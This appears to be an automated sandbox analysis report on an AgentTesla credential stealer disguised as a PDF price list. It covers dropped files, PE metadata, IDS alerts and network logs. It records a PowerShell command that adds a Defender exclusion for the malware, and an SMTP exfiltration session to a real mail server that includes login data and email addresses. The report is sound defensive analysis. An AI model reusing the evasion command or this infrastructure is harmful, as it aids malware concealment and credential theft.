                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ctsdvwT.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.357042452875322
                                          Encrypted:false
                                          SSDEEP:24:3CytZWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:yyjWSU4xymI4RfoUeW+mZ9tK8ND3
                                          MD5:827C68C8F65D2B0800E6791B34AB6D2E
                                          SHA1:151BC96F9C26C53E02D2E0DA64995A462D0C3B4E
                                          SHA-256:6B22A727792EC2ACE1BC27BF00BECBBD842902F2FD0FC813CF45A21A986377D5
                                          SHA-512:67E9E89C531B2CDF47FCBBA3F036EA66427631A8EBF287A26DD35AFB114AF6E2D945304CBF72B94358245FEED658F9BA6E19B29879AE6488D8DC7A143DCC146D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dsa5nlh.01c.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmvhnyyh.glu.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zl1tbnkp.3xp.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4yj0ry.fdp.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):644608
                                          Entropy (8bit):7.8542747881664
                                          Encrypted:false
                                          SSDEEP:12288:cuC2m4rN+8ExBdBT+EOukJEmrxsZ7oFgfiKZUzXrDOGdtTJ1:ct2BrN+8Ex9xIBFwGgfiOKXP
                                          MD5:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          SHA1:AE1F7A5ECE26C423477FBB6048DB707DF4013CB6
                                          SHA-256:F7D4EED71F2BDB8AC845990506C335BB64AF5877DF1925794B000D4A7CF88B84
                                          SHA-512:A55F814EB38F8256529BCE371E46BD8801ABC90AEF844768D28D4C9D544084AA57AA421347BA8CEAD0F01DA08E27DAAD76FE04A65B6B7ED754256091CCAD6A44
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X................0.............j.... ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................K.......H........]...3......#.......B............................................{....*"..}....*....0..f...........3...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}.....(.....*...0.._........s....}.....s....}......}.....(.......(......{....(.......{....(......{....(.......{....(.....*..0............{....r...po.......o.....+d..(.......{......3...%..oB....%.r...p.%..oF......(.....%.r...p.%..oD......(.....%.(.....(....o........(....-...........o ...

                                          C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.8542747881664
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File size:644'608 bytes
                                          MD5:5b35e1e6cdf0d5277fa8dccd5fc06d26
                                          SHA1:ae1f7a5ece26c423477fbb6048db707df4013cb6
                                          SHA256:f7d4eed71f2bdb8ac845990506c335bb64af5877df1925794b000d4a7cf88b84
                                          SHA512:a55f814eb38f8256529bce371e46bd8801abc90aef844768d28d4c9d544084aa57aa421347ba8cead0f01da08e27daad76fe04a65b6b7ed754256091ccad6a44
                                          SSDEEP:12288:cuC2m4rN+8ExBdBT+EOukJEmrxsZ7oFgfiKZUzXrDOGdtTJ1:ct2BrN+8Ex9xIBFwGgfiOKXP
                                          TLSH:A4D41295251EDA23E0A717F902A1D2B45375AECC6112D2476FDA3DFF3C2A36828407A7
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.............j.... ........@.. .......................@............@................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x49eb6a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xD684D858 [Tue Jan 18 10:39:20 2084 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9eb170x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x5bc.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9d4b00x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x9cb700x9cc00937e4efb250fa01a5f32d69ec26a11ffFalse0.9375186901913876data7.861932673509319IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xa00000x5bc0x600a2eacd14af81a8bc99cb0da290f7897eFalse0.421875data4.100842672140593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xa20000xc0x2006ab9b32799089c668e771bdb4e2387e2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xa00900x32cdata0.42980295566502463
                                          RT_MANIFEST0xa03cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-26T11:24:39.741265+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.463220108.167.140.123587TCP
                                          2024-09-26T11:26:17.627129+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.463220108.167.140.123587TCP
                                          2024-09-26T11:26:17.627129+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.463220108.167.140.123587TCP
                                          2024-09-26T11:26:17.627129+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.463220108.167.140.123587TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 26, 2024 11:24:37.612973928 CEST63219587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:37.617922068 CEST58763219108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:37.618004084 CEST63219587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.009836912 CEST63219587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.015001059 CEST58763219108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.017266035 CEST63219587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.032860994 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.037813902 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.038160086 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.607897043 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.608777046 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.614748001 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.767947912 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.768984079 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.773930073 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.936256886 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:38.936496019 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:38.941317081 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.210664034 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.210889101 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.215954065 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.370055914 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.370333910 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.375215054 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.580622911 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.582499981 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.587524891 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.740593910 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.741209984 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.741265059 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.741292000 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.742953062 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:24:39.746166945 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.746185064 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.746196985 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:39.747752905 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:40.067194939 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:24:40.118987083 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:26:17.260062933 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:26:17.264921904 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:26:17.626883030 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:26:17.627039909 CEST58763220108.167.140.123192.168.2.4
                                          Sep 26, 2024 11:26:17.627043009 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:26:17.627129078 CEST63220587192.168.2.4108.167.140.123
                                          Sep 26, 2024 11:26:17.631949902 CEST58763220108.167.140.123192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 26, 2024 11:23:44.846980095 CEST5351546162.159.36.2192.168.2.4
                                          Sep 26, 2024 11:23:45.362792015 CEST53629411.1.1.1192.168.2.4
                                          Sep 26, 2024 11:24:37.234458923 CEST6077353192.168.2.41.1.1.1
                                          Sep 26, 2024 11:24:37.606357098 CEST53607731.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 26, 2024 11:24:37.234458923 CEST192.168.2.41.1.1.10xb0a8Standard query (0)mail.musabody.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 26, 2024 11:24:37.606357098 CEST1.1.1.1192.168.2.40xb0a8No error (0)mail.musabody.com108.167.140.123A (IP address)IN (0x0001)false

                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Sep 26, 2024 11:24:38.607897043 CEST58763220108.167.140.123192.168.2.4220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 04:24:38 -0500
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          Sep 26, 2024 11:24:38.608777046 CEST63220587192.168.2.4108.167.140.123EHLO 675052
                                          Sep 26, 2024 11:24:38.767947912 CEST58763220108.167.140.123192.168.2.4250-gator4156.hostgator.com Hello 675052 [8.46.123.33]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPECONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          Sep 26, 2024 11:24:38.768984079 CEST63220587192.168.2.4108.167.140.123AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
                                          Sep 26, 2024 11:24:38.936256886 CEST58763220108.167.140.123192.168.2.4334 UGFzc3dvcmQ6
                                          Sep 26, 2024 11:24:39.210664034 CEST58763220108.167.140.123192.168.2.4235 Authentication succeeded
                                          Sep 26, 2024 11:24:39.210889101 CEST63220587192.168.2.4108.167.140.123MAIL FROM:<victoria@musabody.com>
                                          Sep 26, 2024 11:24:39.370055914 CEST58763220108.167.140.123192.168.2.4250 OK
                                          Sep 26, 2024 11:24:39.370333910 CEST63220587192.168.2.4108.167.140.123RCPT TO:<pritchardchristopher281@gmail.com>
                                          Sep 26, 2024 11:24:39.580622911 CEST58763220108.167.140.123192.168.2.4250 Accepted
                                          Sep 26, 2024 11:24:39.582499981 CEST63220587192.168.2.4108.167.140.123DATA
                                          Sep 26, 2024 11:24:39.740593910 CEST58763220108.167.140.123192.168.2.4354 Enter message, ending with "." on a line by itself
                                          Sep 26, 2024 11:24:39.742953062 CEST63220587192.168.2.4108.167.140.123.
                                          Sep 26, 2024 11:24:40.067194939 CEST58763220108.167.140.123192.168.2.4250 OK id=1stkjn-0028iQ-27
                                          Sep 26, 2024 11:26:17.260062933 CEST63220587192.168.2.4108.167.140.123QUIT
                                          Sep 26, 2024 11:26:17.626883030 CEST58763220108.167.140.123192.168.2.4221 gator4156.hostgator.com closing connection

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:05:22:58
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0xfc0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0x240000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0x6b0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:4
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\conhost.exe
